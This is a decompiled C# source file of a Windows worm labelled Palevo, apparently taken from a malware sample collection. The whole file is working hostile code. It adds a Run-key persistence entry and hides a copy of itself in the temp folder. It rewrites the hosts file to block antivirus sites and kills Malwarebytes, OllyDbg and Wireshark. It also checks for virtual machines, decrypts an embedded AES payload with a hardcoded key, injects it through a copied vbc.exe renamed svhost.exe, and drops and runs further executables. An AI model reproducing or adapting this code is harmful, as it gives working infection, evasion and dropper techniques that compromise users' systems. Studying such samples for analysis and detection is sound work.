MalwareSourceCode/MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/pizde.cs

// Decompiled with JetBrains decompiler
// Type: pizde
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;

[StandardModule]
internal sealed class pizde
{
  private static string iohouh7877 = "GDGDF54545";
  private static string HostEditing = "%28%";
  private static string antis = "%29%";
  private static string stuff = "%something%";
  private static object Devices;
  private static string Grafikadapter;
  private static string RegionA = "SELECT * FROM Win32_VideoController";

  [STAThread]
  public static void Main()
  {
label_0:
    int num1;
    int num2;
    try
    {
      ProjectData.ClearProjectError();
      num1 = 1;
label_1:
      int num3 = 2;
      string processName = Process.GetCurrentProcess().ProcessName;
label_2:
      num3 = 3;
      Process.GetProcessesByName(processName);
label_3:
      num3 = 4;
      if (Operators.CompareString(pizde.iohouh7877, "hhhhhhhhhheeeee", false) != 0)
        goto label_11;
label_4:
      num3 = 5;
      object tempPath1 = (object) Path.GetTempPath();
label_5:
      num3 = 6;
      object executablePath = (object) Application.ExecutablePath;
label_6:
      num3 = 7;
      object fullPath = (object) Path.GetFullPath(Conversions.ToString(executablePath));
label_7:
      num3 = 8;
      FileAttributes fileAttributes1 = FileAttributes.Hidden | FileAttributes.System;
label_8:
      num3 = 9;
      MyProject.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("rundll32", Operators.ConcatenateObject(tempPath1, (object) "rundll32 .exe"));
label_9:
      num3 = 10;
      FileSystem.FileCopy(Conversions.ToString(fullPath), Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")));
label_10:
      num3 = 11;
      File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")), fileAttributes1);
label_11:
      num3 = 13;
      if (Operators.CompareString(pizde.HostEditing, "hhhhhhhhhheeeee", false) != 0)
        goto label_13;
label_12:
      num3 = 14;
      pizde.HostEdit();
      goto label_14;
label_13:
      num3 = 16;
label_14:
      num3 = 18;
      pizde.AntiMalwarebytes();
label_15:
      num3 = 19;
      pizde.AntiOllydbg();
label_16:
      num3 = 20;
      pizde.AntiWireshark();
label_17:
      num3 = 21;
      pizde.AntiVirtualBox();
label_18:
      num3 = 22;
      pizde.AntiVirtualPC();
label_19:
      num3 = 23;
      pizde.AntiVmWare();
label_20:
      num3 = 24;
      pizde.IsDebuggerPresent();
label_21:
      num3 = 25;
      string s1 = "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
label_22:
      num3 = 26;
      byte[] DAS4DA3 = pizde.okitokjwe33(Convert.FromBase64String(s1));
label_23:
      num3 = 27;
      string str1;
      string s2 = str1;
label_24:
      num3 = 28;
      byte[] data1 = pizde.okitokjwe33(Convert.FromBase64String(s2));
label_25:
      num3 = 29;
      string str2;
      string s3 = str2;
label_26:
      num3 = 30;
      pizde.decrypt(Convert.FromBase64String(s3), "parola");
label_27:
      num3 = 31;
      string str3;
      string s4 = str3;
label_28:
      num3 = 32;
      byte[] data2 = pizde.okitokjwe33(Convert.FromBase64String(s4));
label_29:
      num3 = 33;
      Encoding.GetEncoding(1252).GetBytes(s1);
label_30:
      num3 = 34;
      object tempPath2 = (object) Path.GetTempPath();
label_31:
      num3 = 35;
      Directory.CreateDirectory(Conversions.ToString(Operators.ConcatenateObject(tempPath2, (object) "winamp")));
label_32:
      num3 = 36;
      string VVVVVVCAE = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
label_33:
      num3 = 37;
      string sourceFileName = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe";
label_34:
      num3 = 38;
      string str4 = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
label_35:
      num3 = 39;
      if (File.Exists(str4))
        goto label_37;
label_36:
      num3 = 40;
      File.Copy(sourceFileName, str4);
label_37:
      num3 = 42;
      FileAttributes fileAttributes2 = FileAttributes.Hidden | FileAttributes.System;
label_38:
      num3 = 43;
      File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe")), fileAttributes2);
label_39:
      num3 = 44;
      if (pizde.IsProcessRunning4("nothong.exe"))
        goto label_41;
label_40:
      num3 = 45;
      buffy.mickey(DAS4DA3, VVVVVVCAE);
label_41:
      num3 = 47;
      if (pizde.IsProcessRunning2("%temp%.exe"))
        goto label_46;
label_42:
      num3 = 48;
      if (pizde.IsProcessRunning5("something.exe"))
        goto label_46;
label_43:
      num3 = 49;
      string temp1 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
label_44:
      num3 = 50;
      MyProject.Computer.FileSystem.WriteAllBytes(temp1 + "\\%temp%.exe", data2, false);
label_45:
      num3 = 51;
      Process.Start(temp1 + "\\%temp%.exe");
label_46:
      num3 = 54;
      if (pizde.IsProcessRunning3("%tmp%.exe"))
        goto label_50;
label_47:
      num3 = 55;
      string temp2 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
label_48:
      num3 = 56;
      MyProject.Computer.FileSystem.WriteAllBytes(temp2 + "\\%tmp%.exe", data1, false);
label_49:
      num3 = 57;
      Process.Start(temp2 + "\\%tmp%.exe");
label_50:
      ProjectData.EndApp();
      goto label_57;
label_52:
      num2 = num3;
      switch (num1)
      {
        case 1:
          int num4 = num2 + 1;
          num2 = 0;
          switch (num4)
          {
            case 1:
              goto label_0;
            case 2:
              goto label_1;
            case 3:
              goto label_2;
            case 4:
              goto label_3;
            case 5:
              goto label_4;
            case 6:
              goto label_5;
            case 7:
              goto label_6;
            case 8:
              goto label_7;
            case 9:
              goto label_8;
            case 10:
              goto label_9;
            case 11:
              goto label_10;
            case 12:
            case 13:
              goto label_11;
            case 14:
              goto label_12;
            case 15:
            case 17:
            case 18:
              goto label_14;
            case 16:
              goto label_13;
            case 19:
              goto label_15;
            case 20:
              goto label_16;
            case 21:
              goto label_17;
            case 22:
              goto label_18;
            case 23:
              goto label_19;
            case 24:
              goto label_20;
            case 25:
              goto label_21;
            case 26:
              goto label_22;
            case 27:
              goto label_23;
            case 28:
              goto label_24;
            case 29:
              goto label_25;
            case 30:
              goto label_26;
            case 31:
              goto label_27;
            case 32:
              goto label_28;
            case 33:
              goto label_29;
            case 34:
              goto label_30;
            case 35:
              goto label_31;
            case 36:
              goto label_32;
            case 37:
              goto label_33;
            case 38:
              goto label_34;
            case 39:
              goto label_35;
            case 40:
              goto label_36;
            case 41:
            case 42:
              goto label_37;
            case 43:
              goto label_38;
            case 44:
              goto label_39;
            case 45:
              goto label_40;
            case 46:
            case 47:
              goto label_41;
            case 48:
              goto label_42;
            case 49:
              goto label_43;
            case 50:
              goto label_44;
            case 51:
              goto label_45;
            case 52:
            case 53:
            case 54:
              goto label_46;
            case 55:
              goto label_47;
            case 56:
              goto label_48;
            case 57:
              goto label_49;
            case 58:
              goto label_50;
            case 59:
              goto label_57;
          }
          break;
      }
    }
    catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
    {
      ProjectData.SetProjectError(ex);
      goto label_52;
    }
    throw ProjectData.CreateProjectError(-2146828237);
label_57:
    if (num2 == 0)
      return;
    ProjectData.ClearProjectError();
  }

  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  private static extern int IsDebuggerPresent();

  public static void Main2()
  {
    if (pizde.IsDebuggerPresent() == 1)
      Console.WriteLine("Debugger Is Present");
    else
      Console.WriteLine("Debugger Not Present");
  }

  private static void HostEdit()
  {
    StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\drivers\\etc\\\\hosts");
    streamWriter.Write("127.0.0.1 www.virustotal.com");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 virustotal.com");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 novirusthanks.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 vscan.novirusthanks.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 virusscan.jotti.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 www.virusscan.jotti.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 virscan.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 www.virscan.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 virus-trap.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 www.virus-trap.org");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 filterbit.com");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 www.filterbit.com");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 viruschief.com");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 www.viruschief.com");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 kaspersky.com");
    streamWriter.Write(Environment.NewLine);
    streamWriter.Write("127.0.0.1 www.kaspersky.com");
    streamWriter.Dispose();
  }

  public static bool AntiVirtualBox()
  {
    int num1;
    bool flag;
    int num2;
    try
    {
      ProjectData.ClearProjectError();
      num1 = 2;
      pizde.getDevices();
      flag = Operators.CompareString(pizde.Grafikadapter, "VirtualBox Graphics Adapter", false) == 0;
      goto label_7;
label_2:
      num2 = -1;
      switch (num1)
      {
        case 2:
          ProjectData.EndApp();
          goto label_7;
      }
    }
    catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
    {
      ProjectData.SetProjectError(ex);
      goto label_2;
    }
    throw ProjectData.CreateProjectError(-2146828237);
label_7:
    int num3 = flag ? 1 : 0;
    if (num2 == 0)
      return num3 != 0;
    ProjectData.ClearProjectError();
    return num3 != 0;
  }

  public static bool AntiVmWare()
  {
    int num1;
    bool flag;
    int num2;
    try
    {
      ProjectData.ClearProjectError();
      num1 = 2;
      pizde.getDevices();
      flag = Operators.CompareString(pizde.Grafikadapter, "VMware SVGA II", false) == 0;
      goto label_7;
label_2:
      num2 = -1;
      switch (num1)
      {
        case 2:
          ProjectData.EndApp();
          goto label_7;
      }
    }
    catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
    {
      ProjectData.SetProjectError(ex);
      goto label_2;
    }
    throw ProjectData.CreateProjectError(-2146828237);
label_7:
    int num3 = flag ? 1 : 0;
    if (num2 == 0)
      return num3 != 0;
    ProjectData.ClearProjectError();
    return num3 != 0;
  }

  public static bool AntiVirtualPC()
  {
    int num1;
    bool flag;
    int num2;
    try
    {
      ProjectData.ClearProjectError();
      num1 = 2;
      pizde.getDevices();
      flag = Operators.CompareString(pizde.Grafikadapter, "VM Additions S3 Trio32/64", false) == 0;
      goto label_7;
label_2:
      num2 = -1;
      switch (num1)
      {
        case 2:
          ProjectData.EndApp();
          goto label_7;
      }
    }
    catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
    {
      ProjectData.SetProjectError(ex);
      goto label_2;
    }
    throw ProjectData.CreateProjectError(-2146828237);
label_7:
    int num3 = flag ? 1 : 0;
    if (num2 == 0)
      return num3 != 0;
    ProjectData.ClearProjectError();
    return num3 != 0;
  }

  private static void getDevices()
  {
    // ISSUE: unable to decompile the method.
  }

  public static void AntiMalwarebytes()
  {
    Process[] processes = Process.GetProcesses();
    int num = checked (processes.Length - 1);
    int index = 0;
    while (index <= num)
    {
      if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mbam", false) == 0)
        processes[index].Kill();
      checked { ++index; }
    }
  }

  public static void AntiOllydbg()
  {
    Process[] processes = Process.GetProcesses();
    int num = checked (processes.Length - 1);
    int index = 0;
    while (index <= num)
    {
      if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
        processes[index].Kill();
      checked { ++index; }
    }
  }

  public static void AntiWireshark()
  {
    Process[] processes = Process.GetProcesses();
    int num = checked (processes.Length - 1);
    int index = 0;
    while (index <= num)
    {
      if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
        processes[index].Kill();
      checked { ++index; }
    }
  }

  private static bool IsProcessRunning2(string name)
  {
    Process[] processesByName = Process.GetProcessesByName("%temp%");
    int index = 0;
    if (index >= processesByName.Length)
    {
      bool flag;
      return flag;
    }
    return processesByName[index] != null;
  }

  private static bool IsProcessRunning3(string name)
  {
    Process[] processesByName = Process.GetProcessesByName("%tmp%");
    int index = 0;
    if (index >= processesByName.Length)
    {
      bool flag;
      return flag;
    }
    return processesByName[index] != null;
  }

  private static bool IsProcessRunning4(string name)
  {
    Process[] processesByName = Process.GetProcessesByName("nothong");
    int index = 0;
    if (index >= processesByName.Length)
    {
      bool flag;
      return flag;
    }
    return processesByName[index] != null;
  }

  private static bool IsProcessRunning5(string name)
  {
    Process[] processesByName = Process.GetProcessesByName("something");
    int index = 0;
    if (index >= processesByName.Length)
    {
      bool flag;
      return flag;
    }
    return processesByName[index] != null;
  }

  public static byte[] okitokjwe33(byte[] data)
  {
    using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
    {
      rijndaelManaged.IV = new byte[16]
      {
        (byte) 1,
        (byte) 2,
        (byte) 3,
        (byte) 4,
        (byte) 5,
        (byte) 6,
        (byte) 7,
        (byte) 8,
        (byte) 9,
        (byte) 1,
        (byte) 2,
        (byte) 3,
        (byte) 4,
        (byte) 5,
        (byte) 6,
        (byte) 7
      };
      rijndaelManaged.Key = new byte[16]
      {
        (byte) 7,
        (byte) 6,
        (byte) 5,
        (byte) 4,
        (byte) 3,
        (byte) 2,
        (byte) 1,
        (byte) 9,
        (byte) 8,
        (byte) 7,
        (byte) 6,
        (byte) 5,
        (byte) 4,
        (byte) 3,
        (byte) 2,
        (byte) 1
      };
      return rijndaelManaged.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
    }
  }

  public static byte[] decrypt(byte[] message, string password)
  {
    byte[] bytes = Encoding.Default.GetBytes(password);
    int num1 = (int) message[checked (message.Length - 1)] ^ 112;
    byte[] arySrc = new byte[checked (message.Length + 1)];
    int num2 = checked (message.Length - 1);
    int index1 = 0;
    while (index1 <= num2)
    {
      int index2;
      arySrc[index1] = checked ((byte) ((int) message[index1] ^ num1 ^ (int) bytes[index2]));
      if (index2 == checked (password.Length - 1))
        index2 = 0;
      else
        checked { ++index2; }
      checked { ++index1; }
    }
    return (byte[]) Microsoft.VisualBasic.CompilerServices.Utils.CopyArray((Array) arySrc, (Array) new byte[checked (message.Length - 2 + 1)]);
  }
}